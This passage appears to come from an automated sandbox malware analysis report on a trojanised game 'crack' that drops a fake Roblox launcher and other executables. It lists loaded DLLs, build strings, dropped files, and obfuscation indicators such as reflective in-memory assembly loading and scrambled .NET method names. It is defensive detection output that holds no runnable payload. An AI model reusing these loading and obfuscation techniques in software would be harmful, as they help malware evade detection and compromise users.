            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: msacm32.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeSection loaded: midimap.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\Desktop\RFAwChXSve.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: RFAwChXSve.exeStatic file information: File size 13752832 > 1048576
            Source: RFAwChXSve.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xd1bc00
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: AkrienPremiumCrackByHurminka.exe, 00000002.00000003.1761671972.0000000003891000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000003.1766614314.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe, 00000005.00000003.1765791785.0000000006241000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000000.1762362221.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe.2.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_nbsninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\BootstrapperClient\BootstrapperClient.pdb source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: .pdb /MT source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vKVTrVC9rFRJDAycoWs.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, vKVTrVC9rFRJDAycoWs.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vKVTrVC9rFRJDAycoWs.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf System.AppDomain.Load(byte[])
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf System.Reflection.Assembly.Load(byte[])
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf System.AppDomain.Load(byte[])
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf System.Reflection.Assembly.Load(byte[])
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf System.AppDomain.Load(byte[])
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf System.Reflection.Assembly.Load(byte[])
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TwdfpBTRnVmp5R65UE5.cs.Net Code: AqnmwMo5Jf
            Source: RobloxPlayerLauncher.exe.0.drStatic PE information: 0xF4DCA022 [Sun Mar 7 10:46:58 2100 UTC]
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_008A9D50 LoadLibraryW,GetProcAddress,3_2_008A9D50
            Source: initial sampleStatic PE information: section where entry point is pointing to: .akr1
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeFile created: C:\Browserfont\__tmp_rar_sfx_access_check_4374828Jump to behavior
            Source: RobloxPlayerLauncher.exe.0.drStatic PE information: section name: CPADinfo
            Source: RobloxPlayerLauncher[1].exe.1.drStatic PE information: section name: CPADinfo
            Source: RobloxPlayerLauncher.exe.1.drStatic PE information: section name: CPADinfo
            Source: AkrienPremiumCrack.exe.2.drStatic PE information: section name: _RDATA
            Source: AkrienPremiumCrack.exe.2.drStatic PE information: section name: .akr0
            Source: AkrienPremiumCrack.exe.2.drStatic PE information: section name: .akr1
            Source: AkrienCrack.exe.2.drStatic PE information: section name: .didat
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A2B5D6 push ecx; ret 1_2_00A2B5E9
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A2B5D6 push ecx; ret 3_2_00A2B5E9
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5E28C push eax; ret 5_2_00B5E2AA
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5ED46 push ecx; ret 5_2_00B5ED59
            Source: C:\Browserfont\refdhcp.exeCode function: 9_2_00007FFD9B9F7430 pushfd ; iretd 9_2_00007FFD9B9F7433
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeCode function: 38_2_00007FFD9BA07430 pushfd ; iretd 38_2_00007FFD9BA07433
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, O2YtyfIDiYTK070fC05.csHigh entropy of concatenated method names: 'pWhTQsRjgk', 'T09T4IX7Zo', 'abLTvRXmfm', 'ryitSeyb4hfqGxDAJEw', 'A1yyeUyvs0tfBlpiuH6', 'x6XDGWycDTQeKnqBykA', 'olIhD9yyAtieoXlLS4X', 'xaAPLYyVAeyRJGMLkUC', 'MZuadByjEj4wPxEFDsk', 'Ut0WRfygYuq7CVQC5Bd'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, lIPbOfIYOHHrYvNO3qc.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'A3y6n3viAYmderCd449', 'kVGZw7vUfqZaUucKiS7', 'eeTAwtvGLBleAiyJJVe', 'i24huOvuKtcZwhKBiUu', 'DFlJ6OvCRpWkQxklXsN', 'L0DZgCvtmMHMXn4sLSh'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TwdfpBTRnVmp5R65UE5.csHigh entropy of concatenated method names: 'X6RmEBEolN', 'xHhmUoXXnE', 'MnhmN30RZv', 'Y6nmSYcLvQ', 'VSnm0Q2y8G', 'ECpmP5KLO5', 'HFFmFmfngW', 'fhe2LGj1lpFTRgRiUJV', 'ch5j88jD6mKeM93Nrnf', 'FWkxqTj8UCEsm4QppD3'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, s4wpNiLZ0WUYsPOnqfX.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'WL3wWg2byt', 'veUwBsRIl1', 'r8j', 'LS1', '_55S'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, IH93p4mwYBQO4SokTUB.csHigh entropy of concatenated method names: 'I0KlqxsYdE', 'TaTlMrx11t', 'zsrl8U05qy', 'z5ElgmUCAC', 'vakmpH6aXvrrLJtfy8T', 'EV0W696Kx4Wc7wOltCV', 'kps6fD6i1DSYHs0oc42', 'oF5DuX6SgGsVvrp1Iun', 'XcXdoa65NyLjIsIIJhd', 'd0Dp646Ub4FR4FyutZU'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, jvIp3gTfEixZsGdfVAC.csHigh entropy of concatenated method names: 'AaSeliqjdj', 'aMSeRBUXrC', 'dqgYVysqPs6dDZ9UCXQ', 'aZU5eNshodkvi0iPkJA', 'ciSWmVsM8BBi7KZvVJB', 'Cxo1QusNxVXJwme3Hlx', 'mT5e2G9KuG', 'IexjGGPYqmuMLR1lKmr', 'Oietf9P3lXq61Q3T1Tt', 'JKwg9tsET9PVLGx2eZg'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, qO5yTFmLu5opX3ZMV1f.csHigh entropy of concatenated method names: 'AVuC15sW7R', 'AS6CqHxtVk', 'Ls9CMCQvYk', 'BWiC85Ck4q', 'qJuCguWhoD', 'oE8CKtZXBu', 'MZrot5p9wRF81jdIEv2', 'HRWG6CpxLtk2xc3bZgl', 'QQiIEmpkhaHq5DO5kZT', 'D8bG7EpLfSrMnpdraaU'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Me6JAxQ4of4LhCOr6L.csHigh entropy of concatenated method names: 'bjMvZlUJM', 'xq7cA6tYu', 'ecy5MWr3L', 'PtOiTEQr7', 'H0kGaLq4p', 'i6HY80B8Y', 'yGJXyxIeG', 'GHJgF33Fbn7KVTWuSjg', 'kMAaRB3v6WwG1rWjoKW', 'T9pgap3c56bZDscXbTZ'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, sv4rMwIyuQXEuVp8nnk.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'qgiKaBb6jY4Rpdu4F8E', 'rFabVLbw9lt1VE9dhVt', 'HHJwevbDLFv1eSCJ194', 'lm2hXdb8PtcSHuW15km', 'Lxyw3Wb1O7OZw4d6ouM', 'F9ES7IbHQcbmDsVn2XU'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, g3sLrMesBbvOMqVG0fk.csHigh entropy of concatenated method names: 'yJA5Vqwc3R', 'tHU5bEwlSZ', 'Bee5sseiB4', 'oeJ5QxlEm7', 'Odv54OE3X6', 'RBuh3pC2vlw3f4o0lYx', 'fnUAXdCX7nWCZXDVapE', 'cVnOHlCEZNGAGeLyRuO', 'UosYGMCzapShMegxME4', 'rCeCkwtYE2ZfQY0Us8M'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, i81QY8TYuIs4vFfXLRm.csHigh entropy of concatenated method names: 'DM0Lj9jqX7', 'oE0LDH5gtS', 'v3dLzJwLKv', 'eS3dAWU3eR', 'g4wdIsiKAA', 'wEPdTDaodH', 'A79dm4XBFD', 'UAFdLX5mlK', 'CnHddSwEH6', 'nmXBTfeqemZLwOlmwnx'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, il2IAWdETABuWR6m6cs.csHigh entropy of concatenated method names: 'r8DvO11xSL', 'l7QvouXB78', 'nPcv3KqHmW', 'BRQvkbRM3k', 'zRIv64FyIp', 'f9Pvjjj1Xy', 'DHlOxqUOIBJJlKRgqvH', 'b47f1HUQeHnLPf4ITZx', 'NnkfBMUfTdgRfKJ2cuE', 'oRy6ufUZ5BcLcjP6SXc'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, xIT5YmIg81BwKELfqgQ.csHigh entropy of concatenated method names: 'aC6Txtrw6W', 'YNqTagSm2k', 'OcqRIwbyYOCp99QUyjw', 'fMxeKjbceUSuw7VMb8T', 'OI37axbbNToKhWeijLn', 'Q5GOAFbVYjP5JS8HK88', 'adI5HKbjYBVF7c1lYMK', 'Bj4y4BbgSyVfk1gsmfs', 'aZ6aC0bRAf2BLxakB2Y', 'Y5vVavbebKLZWLuydC9'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vxIWZ2mvRGvZl5SgiHJ.csHigh entropy of concatenated method names: 'rXbREpPqx3', 'RKxRUXleJE', 'Nerb6fDPtI2ho5SJOCT', 'A1DQkpDpvQIefPnHdWh', 'cwI8aND03hbDWq4NtwQ', 'nLo5fPDsQA73wCchXPa', 'G1OcFjDI7hu4BHW0rLl', 'hXDcMYD6nNJahOPrRuR'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vNULWuT2mnfUhyGDvVO.csHigh entropy of concatenated method names: 'wK2mjSFlIW', 'DoPmDtVcEB', 'NCwAmhgpmUEl7pdrpbw', 'ld8dr5gIrxAh2TCwXBM', 'UP0G6Tg6bGPLN9vS4qV', 'tXjSYWgwhsESLOdFZqf', 'BS6p1vgDdwGMWw3s0Hf', 'Rcpqsmg8nV1c5hfVG1g', 'JXmYXeg1wn5NjK6PRPx', 'y9OrsZgHaiqHWIFUn4Z'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, HubuWUCxinHEtH6L3g2.csHigh entropy of concatenated method names: 'cWSQFZooFoBrU', 'pXX3kFQRIdXtm34Rni8', 'lcerWcQeQ2wpI80ygdQ', 'qgLJtwQ0Mm86GZI4ioN', 'qrpShFQsnCTE9xpl337', 'hfMw93QPf9H3yUCOqQK', 'LNHoQdQjPMUi9u52fhv', 'lpIWtQQg04tHsJ9bAxP', 'spgiX0QpTeMYBLQ9ArC', 't8fYKUQIFYmMyfCAZ8Y'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, IqcmvwdncZ0sNPSCbVR.csHigh entropy of concatenated method names: 'w6kvKilV1r', 'WY4vymYypY', 'bMGvZOItjo', 'j7Q9hbUC7iUhJbfS5I1', 'zcwxOTUGn9AXFuV287h', 'IUtp0eUuyuvY7Sahs6h', 'vjtYyrUtpvyuVBeWGax', 'oqrSHdUTroKdOFeJctN', 'UY0AvJUn9MTVQiRABix', 'pijxvFUA8nI9H2ZDdlB'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, mjXiH9Iw8qI21RXoth7.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'GYx7gKWuSl6aJLEVS6M', 'fKmSCVWCUQ2U4uWunSo', 'gLmctAWtMrObRDHOVmF', 'CP8E84WTU8rxsgmCRCY', 'gAgTUNWngoZMvZTbgy9', 'bpSyDlWAcdRBaIB8F5R'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Ch30RZIrvD6nYcLvQ3S.csHigh entropy of concatenated method names: 'e1GTIJlElI', 'COiTTh5HaH', 'mAQTme5JxZ', 'd4gyLYcoiAPkP3RwofL', 'OcHc4jcMniuRHUQuhlX', 'iDCxEZcZMdTCBupM4MV', 'WjyOWCcmkoW9rAMfLoc', 's8kmVmcNRDkTQJCMMay', 'lhlXC0cqYwettaJi7AL', 'DuqduxchRH6Lfoq5tOA'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, yreLk8LxTmerL9n4Vc6.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, jqTpyseiqpAIuD3HEEI.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, GH9f9xgQcnDETOPx5N.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ab41FcBnX5VtJF69fnP', 'O0UpwkBAn42lFOnIkJo', 'bcu2TtBQKC292AZivmL', 'hdilcEBfNcIK2ZGNIoL', 'l2kbZfBOgqKTZIuWv7m', 'QUdsFKBZjwp03UHkpeB'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TlUOfImhs5BD8vYScS4.csHigh entropy of concatenated method names: 'jmnlU5SaPW', 'TOclN1VwLj', 'V2YlS5bs25', 'qrhA956g0xIbTSCdPSG', 'Xry6b26Veev8JQ8dO4G', 'TJeRfJ6jJm3GyhY4XWh', 'iu683M6RcGyD1lGpK4H', 'nsdlWpKyiI', 'zZIlB2RofT', 'Slrl2lC3ig'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, ne6EjaLkbnELWkAVVZs.csHigh entropy of concatenated method names: 'OygWcjUMHY', 'EW6Wi35LJt', 'tHTW9ad87Z', 'AZJWwaiKHY', 'OYoWWZE12J', 'ulIWBy9i5j', 'WRmW2GtG2c', 'zo3WtN4qxI', 'eBIWJANhKl', 'nlJWHJtZsE'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, id8ZLJm1lbi8yHjBtkP.csHigh entropy of concatenated method names: 'sg9', 'qnyjUX0fHJ', 'SYxRjIEW2A', 'MQAjBADwgr', 'tR6vnnDOlM1kVItul1F', 'Oc6LCkDZI6mVGUBClYh', 'o2wXO8DmDrDcfYqfFMB', 'fcb3k2DQFGo9jkRBFiC', 'wOEo4TDf4ZfuEmPve6U', 'DKpuflDoAxl4AKUKdww'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, VI2gpKee3fYyA0EcDfh.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, KMsi7FeMaxHccyd4OLf.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'XReXRhxmtX', 'RdxXh7b1ys', 'eO9XxnE4Ex', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csHigh entropy of concatenated method names: 'lyjql0QrfdL1hkn4IP6', 'QJZua1QxP1XkwoMOhAk', 'FjRastQ11MdHJNwxMcq', 'qkjiCfQH5WPfndik99L', 'VThpwX45B7', 'B84LelQLHMa4xnLKKA4', 'cG2bRnQ4HRArhOvooFM', 'Dk1aJVQSM5vSAPUwE3Q', 'xYSSwaQ51CIv8iX1apb', 'lgC3UQQaW535RqdbHSh'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, qOqfHwmoGFWsdpKyiIG.csHigh entropy of concatenated method names: '_269', '_5E7', 'SPVjV513kC', 'Mz8', 'Xh1jvRee8r', 'yY9QAB8oZiZjC25SVht', 'zxF8GZ8MKAvNC1v74TG', 'U3Q4CV8Njdka7LEDbyB', 'mHow348qf3Je8cKsfds', 'Ra7sKu8hHOudnPRi8aB'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, M4R0dhmkIrbj0P0jplW.csHigh entropy of concatenated method names: 'Y10qDv1UxtgC4nMAmLV', 'DUPBh01GBbiQQNgArXF', 'GwVN6a1K9yy55XTb3gK', 'pBqwgZ1iOmc37eZuh98', 'IWF', 'j72', 'Cqfh2XFAJ6', 'L08htwRLl7', 'j4z', 'CvKhJO6J1D'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, HbFiVLCcvWLYglkTtE8.csHigh entropy of concatenated method names: 'lIZpvfQwlp', 'Aa6pcomyZr', 'h7Sp5uEBMG', 'nGypiHVG4p', 'YxTpGgFV3H', 'xbOpYwOlRq', 'kCspXQBvNk', 'O45pnMl3OK', 'zqZppqrU6s', 'yAEpE1RRvI'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, SEHOAvdOU1Khvs1klch.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, GQ9Ue3mBqMkdSQJuRBW.csHigh entropy of concatenated method names: 'D04ly4vpNs', 'cJ7lZllskk', 'JK5l7reLk8', 'XnOpsS6QQOZFKoPcUkZ', 'R2LENt6fELg9fMoR9ps', 'UHCnwY6OH9UE4MD8iun', 'gV6vhg6Zx0hC5NDxl8R', 'IcoCTk6mwITptqojWui', 'ELIqng6oxpArsINauo2', 'VKyoUI6M3vPuyY1Hetf'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, bfT69bmgjSH0amKEjrJ.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'p0pjS5wwOI', 'WmRhLQDfAb', 'WGOjDX4cPI', 'jawPHT8jY6q0LtXmsf5', 'awiPHm8g6TrQEiVpiKr', 'bPQuPX8RtdLRcCVVPaP', 'ltqHuD8eP38qkxq4pfZ', 'MwdWa780I1jhrqxlC64'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TlbBVQSFLtH5rbgfHS.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'jvYAZFJXACPtwxh8g42', 'n38YasJEpOYStjFXloo', 'mDMWLkJzU72E3titY11', 'rXHJ35dY5NlZc69OLri', 'fF0avld38pKHkrXDXwO', 'SnxoXbdJ5pJEZO2xQvB'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, HgYfyZIk2SRCsmW2ZwY.csHigh entropy of concatenated method names: 'mT6THIFWnm', 'f469NGy7ofGNIKyE1Cv', 'SFI1NfyWKOJ8Mep5NXX', 'gXwX5ayB1FjBBY7hDON', 'Bs5J5yylHBRkXyA2hhL', 'H3UEiqyFCFZ4tCD6PSv', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, FLa5R7Cqn0wTkoKVhS.csHigh entropy of concatenated method names: 'k5R97qn0w', 'ScWj1q5qo8t5iZvSIG', 'YbViLZ4peSO8XjJjAt', 'lsGoCrSoP2kpusJvav', 'SrcTnAanciZhxxEYei', 'qGMt5XKtjGR9xf1d9k', 'pjVTPaums', 'PfUms1T85', 'A1iL77PnZ', 'cyAdNTnwr'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, C6MOHv7t281xyXllbC.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'GuXGEBlR7UyOeU52wsL', 'lLBTeAleQNXFrNgcYF0', 'tpY0Inl0dtsbjjyteqa', 'xMTNp1lsJjWITx43jeB', 'fpB3GclPm8isDKn2nmT', 'EO0vRAlpVaR0FXhP6Y2'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, D7QSuBL29w3nS6Vw29i.csHigh entropy of concatenated method names: 'UXVuL7NuJJ', 'kSmud8P71y', 'pD0ue2u3sT', 'QY0GZWr0CEurhHFm4QA', 'd61EITrsfFDAPnbWQ5x', 'p9Er23rRXZgPKwToUCo', 'wwkAGXredqTh0Qju2nZ', 'kKaaGGrPgimsOZmuwpZ', 'cCkXHGrpfOXOkKAe65A', 'as4VKerIWxfuVyaKmXu'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Qr2PMBec4MIXKxZlNRg.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vsxgtqLvg6YNZfPEUmJ.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'LG09AFFsAv', '_3il', 'oDn9I7fWWU', 'MeK9T1iZdE', '_78N', 'z3K'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, u7HZG9TwYDjcl42lBdB.csHigh entropy of concatenated method names: 'dZymkwlb79', 'ox6EeRgdbBwfrl3Vvjw', 'EfE6e0gBwUjTKH1uE9x', 'O4AUcbg3XXtVRuA2md1', 'oGJD07gJbG2U9XoNhed', 'wVXfe3glrVJySqNVaoq', 'iOUV37g7gb73JpXEBnw', 'qNKEyCgWZS2FTQuohqU', 'pNDDAegFI5VhXN4bxQ7', 'vtetUHgvsrQqRx9VLp3'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, aVQNZKIxZnDqXqRhLco.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'z14ZxnWpfuoOohOaIiN', 'xPiLr2WIvGDmVrgkabq', 'gSfia4W6QXjgUpQ6SU8', 'xkU90bWwMJVlovQp4DE', 'BJZJKiWDkZuJHyDOQDw', 'a5bAFIW8Z0eiRMCKa7U'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, PIqp0udDQIruKYuA5Yw.csHigh entropy of concatenated method names: 'xIscGdpk7k', 'nnBcY1AKSq', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'ppacX3dDcO', '_5f9', 'A6Y'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, GWixqpzShZ1Fhf7o7y.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Va5cu07d1mVSStlIL2g', 'mwEJ9G7BVXXKD3LH3Of', 'XaJ0co7l2caNY4uR6MT', 'Q56iIM77i9dOQjg0Jn6', 'LtWQyO7WlybS7pMISp2', 'S4DMyX7FNyjVuQVP1Bw'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, hNpSlbov5mWDdLF0Nx.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'MvsAV2lk3HMDR9se76R', 'YYM1CDl9ppeFQOWJxKZ', 'lWtCr6lLQAJF9doUw5h', 'tEWdTel4RZUf1ef5UMS', 'Sov3FslS9EIP1BLFrK2', 'hOfrOhl5WrWUDLtKQNp'
